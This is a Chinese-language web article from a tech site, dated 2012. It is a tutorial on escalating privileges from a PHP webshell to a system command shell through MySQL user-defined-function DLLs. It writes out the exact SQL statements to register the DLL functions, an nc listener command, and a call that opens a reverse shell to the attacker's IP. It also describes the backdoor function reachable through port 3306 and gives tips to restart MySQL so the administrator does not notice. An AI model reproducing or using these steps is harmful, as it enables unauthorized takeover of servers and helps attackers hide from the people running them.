作家
登录

WEBSHELL提升权限又一招(Mysql漏洞)

作者: 来源: 2012-06-12 15:07:01 阅读 我要评论

MYSQLl弱口令可以拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才能进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。目前我拿我另外一台机器做示范,已把PHPSHELL传上去了,如图1

WEBSHELL提升权限又一招(Mysql漏洞)

一般来说连接MYSQL的帐户密码非常好找,随便编辑一个PHP文件,就看到了。如图2

WEBSHELL提升权限又一招(Mysql漏洞)

看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3

WEBSHELL提升权限又一招(Mysql漏洞)

连接成功了,目前开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.

出现SQL语句成功执行!如图4

WEBSHELL提升权限又一招(Mysql漏洞)

离拿到CMDSHELL已不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,如图5

WEBSHELL提升权限又一招(Mysql漏洞)

执行成功,然后看看我们的NC有反映没,如图6

WEBSHELL提升权限又一招(Mysql漏洞) 

成功得到CMSHELL,不过这时对方的MYSQL已假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接所有外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix相同,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (''); 然后用nc连接3306端口,然后输入f**k 就能得到一个cmdshell了如图7

WEBSHELL提升权限又一招(Mysql漏洞)

测试结束 

WEBSHELL提升权限的技巧(Mysql漏洞)大家应该掌握了,希望大家多多了解这方面的知识。

【编辑推荐】

  1. 详细解析数据加密
  2. 内部网中的密码管理
  3. 探讨ECC加密被破译的可能性
  4. 信息安全的核心之密码技术 上
  5. 密码遗忘通关手册 为你减少不必要的麻烦 上

  推荐阅读

  Flash再曝天窗漏洞 黑客可轻易远程攻击

Flash被广泛用于网页游戏、视频等互联网服务中,保守估计90%以上的网民电脑都将受到该漏洞影响。目前,360安全卫士已紧急升级防御规则,可以全面拦截针对Flash“天窗”漏洞的攻击。经360安全中心分析,Fla>>>详细阅读


本文标题:WEBSHELL提升权限又一招(Mysql漏洞)

地址:http://www.17bianji.com/anquan/buding/550.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)